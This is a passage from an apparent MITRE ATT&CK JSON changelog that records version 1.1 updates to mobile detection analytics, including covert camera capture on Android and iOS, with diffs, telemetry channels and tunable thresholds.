                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between abnormal resource loading and execution/network activity\"}, {\"field\": \"AllowedLibraryPaths\", \"description\": \"Baseline of expected library/resource load paths per application\"}, {\"field\": \"TrustedSignatureList\", \"description\": \"Trusted signing identities for application components\"}, {\"field\": \"AllowedAppList\", \"description\": \"Applications allowed to dynamically load code or use external resources\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-13 15:50:52.912000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Correlates (1) abnormal application or system resource resolution behavior (e.g., library loading, path resolution, or intent redirection), (2) execution of code or resources not aligned with the originating application\\u2019s package identity or expected runtime context, and (3) follow-on execution or network activity originating from the hijacked flow. The defender observes a causal chain where execution is redirected from an expected code path to an alternate resource or payload, resulting in execution under a trusted context but with untrusted origin.\", \"old_value\": \"Mobile threat defense agents could detect unauthorized operating system modifications by using attestation.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application launches or executes code where loaded library or component path does not match application package path or expected signing context\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to103__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to103__0\"><a href=\"#difflib_chg_to103__top\">t</a></td><td class=\"diff_header\" id=\"from103_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;threat&nbsp;defense&nbsp;agents&nbsp;could&nbsp;detect&nbsp;unauthorized&nbsp;opera</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to103__top\">t</a></td><td class=\"diff_header\" id=\"to103_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Correlates&nbsp;(1)&nbsp;abnormal&nbsp;application&nbsp;or&nbsp;system&nbsp;resource&nbsp;resol</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ting&nbsp;system&nbsp;modifications&nbsp;by&nbsp;using&nbsp;attestation.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ution&nbsp;behavior&nbsp;(e.g.,&nbsp;library&nbsp;loading,&nbsp;path&nbsp;resolution,&nbsp;or&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ntent&nbsp;redirection),&nbsp;(2)&nbsp;execution&nbsp;of&nbsp;code&nbsp;or&nbsp;resources&nbsp;not&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ligned&nbsp;with&nbsp;the&nbsp;originating&nbsp;application\u2019s&nbsp;package&nbsp;identity&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;expected&nbsp;runtime&nbsp;context,&nbsp;and&nbsp;(3)&nbsp;follow-on&nbsp;execution&nbsp;or&nbsp;n</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">etwork&nbsp;activity&nbsp;originating&nbsp;from&nbsp;the&nbsp;hijacked&nbsp;flow.&nbsp;The&nbsp;defe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nder&nbsp;observes&nbsp;a&nbsp;causal&nbsp;chain&nbsp;where&nbsp;execution&nbsp;is&nbsp;redirected&nbsp;f</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rom&nbsp;an&nbsp;expected&nbsp;code&nbsp;path&nbsp;to&nbsp;an&nbsp;alternate&nbsp;resource&nbsp;or&nbsp;payloa</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d,&nbsp;resulting&nbsp;in&nbsp;execution&nbsp;under&nbsp;a&nbsp;trusted&nbsp;context&nbsp;but&nbsp;with&nbsp;u</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ntrusted&nbsp;origin.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--4476a312-d2c9-459e-96a3-53ac0b676c52",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-19 20:20:49.044000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0695#AN1808",
                            "external_id": "AN1808"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1808",
                    "description": "The defender correlates Android camera access by an app identity with app and device context showing that the capture is inconsistent with expected user-driven recording behavior. The strongest Android evidence is camera resource access followed by sustained capture duration, video or image artifact creation, buffer or cache growth, and optional outbound transfer, especially when the app is backgrounded, operating as a foreground service without visible user initiation, active while the device is locked, or capturing without recent user interaction. The detection is strengthened when the app is unmanaged, recently granted camera access, or not approved to record video.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Camera sensor access began from app identity and remained active for sustained capture interval in app context not mapped to approved video recording workflow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
                            "name": "MobileEDR:telemetry",
                            "channel": "Camera sensor access occurred while AppState=background, foreground service active without visible user action, or DeviceLockState=locked during capture interval"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before camera session start and no foreground transition occurred during sustained capture interval"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "App identity performing camera session was unmanaged, recently granted camera permission, or not approved to use camera for video or interval image capture"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window linking camera access, lifecycle context, artifact creation, and optional network transfer."
                        },
                        {
                            "field": "CaptureDurationThreshold",
                            "description": "Minimum sustained camera session duration considered unusual for the app role."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved camera-capable apps vary by organization, device group, and role."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Some apps should only access the camera while visibly foregrounded."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close camera activation must be to user interaction to be considered expected."
                        },
                        {
                            "field": "AllowedBackgroundCaptureApps",
                            "description": "Specific enterprise or accessibility workflows may legitimately capture while not foregrounded."
                        },
                        {
                            "field": "ArtifactWriteThreshold",
                            "description": "Minimum media-buffer or file-write volume indicating probable video or burst-image capture."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Threshold for suspicious outbound transfer after capture."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window linking camera access, lifecycle context, artifact creation, and optional network transfer.\"}, {\"field\": \"CaptureDurationThreshold\", \"description\": \"Minimum sustained camera session duration considered unusual for the app role.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved camera-capable apps vary by organization, device group, and role.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Some apps should only access the camera while visibly foregrounded.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close camera activation must be to user interaction to be considered expected.\"}, {\"field\": \"AllowedBackgroundCaptureApps\", \"description\": \"Specific enterprise or accessibility workflows may legitimately capture while not foregrounded.\"}, {\"field\": \"ArtifactWriteThreshold\", \"description\": \"Minimum media-buffer or file-write volume indicating probable video or burst-image capture.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Threshold for suspicious outbound transfer after capture.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-19 20:20:49.044000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates Android camera access by an app identity with app and device context showing that the capture is inconsistent with expected user-driven recording behavior. The strongest Android evidence is camera resource access followed by sustained capture duration, video or image artifact creation, buffer or cache growth, and optional outbound transfer, especially when the app is backgrounded, operating as a foreground service without visible user initiation, active while the device is locked, or capturing without recent user interaction. The detection is strengthened when the app is unmanaged, recently granted camera access, or not approved to record video.\", \"old_value\": \"The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions.\\nDuring the vetting process, applications using the Android permission `android.permission.CAMERA`, or the iOS `NSCameraUsageDescription` plist entry could be given closer scrutiny. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions.\\n-During the vetting process, applications using the Android permission `android.permission.CAMERA`, or the iOS `NSCameraUsageDescription` plist entry could be given closer scrutiny. \\n+The defender correlates Android camera access by an app identity with app and device context showing that the capture is inconsistent with expected user-driven recording behavior. The strongest Android evidence is camera resource access followed by sustained capture duration, video or image artifact creation, buffer or cache growth, and optional outbound transfer, especially when the app is backgrounded, operating as a foreground service without visible user initiation, active while the device is locked, or capturing without recent user interaction. The detection is strengthened when the app is unmanaged, recently granted camera access, or not approved to record video.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Camera sensor access began from app identity and remained active for sustained capture interval in app context not mapped to approved video recording workflow\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Camera sensor access occurred while AppState=background, foreground service active without visible user action, or DeviceLockState=locked during capture interval\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before camera session start and no foreground transition occurred during sustained capture interval\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"App identity performing camera session was unmanaged, recently granted camera permission, or not approved to use camera for video or interval image capture\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to104__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to104__0\"><a href=\"#difflib_chg_to104__top\">t</a></td><td class=\"diff_header\" id=\"from104_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;view&nbsp;which&nbsp;applications&nbsp;have&nbsp;permission&nbsp;to&nbsp;use&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to104__top\">t</a></td><td class=\"diff_header\" id=\"to104_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;Android&nbsp;camera&nbsp;access&nbsp;by&nbsp;an&nbsp;app&nbsp;iden</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">the&nbsp;camera&nbsp;through&nbsp;the&nbsp;device&nbsp;settings&nbsp;screen,&nbsp;where&nbsp;the&nbsp;use</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tity&nbsp;with&nbsp;app&nbsp;and&nbsp;device&nbsp;context&nbsp;showing&nbsp;that&nbsp;the&nbsp;capture&nbsp;is</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">r&nbsp;can&nbsp;then&nbsp;choose&nbsp;to&nbsp;revoke&nbsp;the&nbsp;permissions.&nbsp;During&nbsp;the&nbsp;vett</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;inconsistent&nbsp;with&nbsp;expected&nbsp;user-driven&nbsp;recording&nbsp;behavior.&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ing&nbsp;process,&nbsp;applications&nbsp;using&nbsp;the&nbsp;Android&nbsp;permission&nbsp;`andr</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;strongest&nbsp;Android&nbsp;evidence&nbsp;is&nbsp;camera&nbsp;resource&nbsp;access&nbsp;fol</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">oid.permission.CAMERA`,&nbsp;or&nbsp;the&nbsp;iOS&nbsp;`NSCameraUsageDescription</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">lowed&nbsp;by&nbsp;sustained&nbsp;capture&nbsp;duration,&nbsp;video&nbsp;or&nbsp;image&nbsp;artifact</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">`&nbsp;plist&nbsp;entry&nbsp;could&nbsp;be&nbsp;given&nbsp;closer&nbsp;scrutiny.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;creation,&nbsp;buffer&nbsp;or&nbsp;cache&nbsp;growth,&nbsp;and&nbsp;optional&nbsp;outbound&nbsp;tra</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nsfer,&nbsp;especially&nbsp;when&nbsp;the&nbsp;app&nbsp;is&nbsp;backgrounded,&nbsp;operating&nbsp;as</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;a&nbsp;foreground&nbsp;service&nbsp;without&nbsp;visible&nbsp;user&nbsp;initiation,&nbsp;activ</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;while&nbsp;the&nbsp;device&nbsp;is&nbsp;locked,&nbsp;or&nbsp;capturing&nbsp;without&nbsp;recent&nbsp;us</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;interaction.&nbsp;The&nbsp;detection&nbsp;is&nbsp;strengthened&nbsp;when&nbsp;the&nbsp;app&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;unmanaged,&nbsp;recently&nbsp;granted&nbsp;camera&nbsp;access,&nbsp;or&nbsp;not&nbsp;approved</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;to&nbsp;record&nbsp;video.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--e6c05bf0-e6d6-46f9-ba38-11b58fbf2f26",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-23 20:54:34.747000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0695#AN1809",
                            "external_id": "AN1809"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1809",
                    "description": "The defender correlates managed-app or supervised-device camera access with app and device context showing that the capture is inconsistent with expected user-driven recording behavior. The strongest iOS evidence is camera access or camera-adjacent capture activity followed by app-state evidence such as background or low-interaction operation, optional media artifact creation, and optional post-capture network transfer. Because direct low-level runtime visibility is weaker than Android for many enterprises, the primary iOS analytic should anchor on managed app context, device state, and downstream effects around camera use, with local subsystem telemetry treated as enrichment rather than sole proof.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Background activity, low-interaction device state, or DeviceLockState=locked was observed during sustained camera session or immediately before camera access from same bundle context"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Bundle performing camera session was not present in approved managed-app baseline or was not permitted to use camera for video or interval image capture"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window linking camera access, device state, artifact creation, and optional network transfer."
                        },
                        {
                            "field": "CaptureDurationThreshold",
                            "description": "Minimum sustained camera session duration considered unusual for the bundle role."
                        },
                        {
                            "field": "SupervisedRequired",
                            "description": "Strongest bundle-baseline and managed-app analytics depend on supervised iOS devices."
                        },
                        {
                            "field": "AllowedManagedApps",
                            "description": "Approved managed bundle identities with camera capability vary by organization and device profile."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Some managed apps should only access the camera during visible foreground use."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close camera activation must be to user interaction to be considered expected."
                        },
                        {
                            "field": "AllowedBackgroundCaptureApps",
                            "description": "Specific approved workflows may legitimately capture media under constrained background-like conditions."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window linking camera access, device state, artifact creation, and optional network transfer.\"}, {\"field\": \"CaptureDurationThreshold\", \"description\": \"Minimum sustained camera session duration considered unusual for the bundle role.\"}, {\"field\": \"SupervisedRequired\", \"description\": \"Strongest bundle-baseline and managed-app analytics depend on supervised iOS devices.\"}, {\"field\": \"AllowedManagedApps\", \"description\": \"Approved managed bundle identities with camera capability vary by organization and device profile.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Some managed apps should only access the camera during visible foreground use.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close camera activation must be to user interaction to be considered expected.\"}, {\"field\": \"AllowedBackgroundCaptureApps\", \"description\": \"Specific approved workflows may legitimately capture media under constrained background-like conditions.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-23 20:54:34.747000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates managed-app or supervised-device camera access with app and device context showing that the capture is inconsistent with expected user-driven recording behavior. The strongest iOS evidence is camera access or camera-adjacent capture activity followed by app-state evidence such as background or low-interaction operation, optional media artifact creation, and optional post-capture network transfer. Because direct low-level runtime visibility is weaker than Android for many enterprises, the primary iOS analytic should anchor on managed app context, device state, and downstream effects around camera use, with local subsystem telemetry treated as enrichment rather than sole proof.\", \"old_value\": \"The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions.\\nDuring the vetting process, applications using the Android permission `android.permission.CAMERA`, or the iOS `NSCameraUsageDescription` plist entry could be given closer scrutiny. \", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions.\\n-During the vetting process, applications using the Android permission `android.permission.CAMERA`, or the iOS `NSCameraUsageDescription` plist entry could be given closer scrutiny. \\n+The defender correlates managed-app or supervised-device camera access with app and device context showing that the capture is inconsistent with expected user-driven recording behavior. The strongest iOS evidence is camera access or camera-adjacent capture activity followed by app-state evidence such as background or low-interaction operation, optional media artifact creation, and optional post-capture network transfer. Because direct low-level runtime visibility is weaker than Android for many enterprises, the primary iOS analytic should anchor on managed app context, device state, and downstream effects around camera use, with local subsystem telemetry treated as enrichment rather than sole proof.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"LastUserInteractionDelta exceeded threshold before app-attributed session using non-standard protocol-to-port pairing\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Background activity, low-interaction device state, or DeviceLockState=locked was observed during sustained camera session or immediately before camera access from same bundle context\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Bundle performing camera session was not present in approved managed-app baseline or was not permitted to use camera for video or interval image capture\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
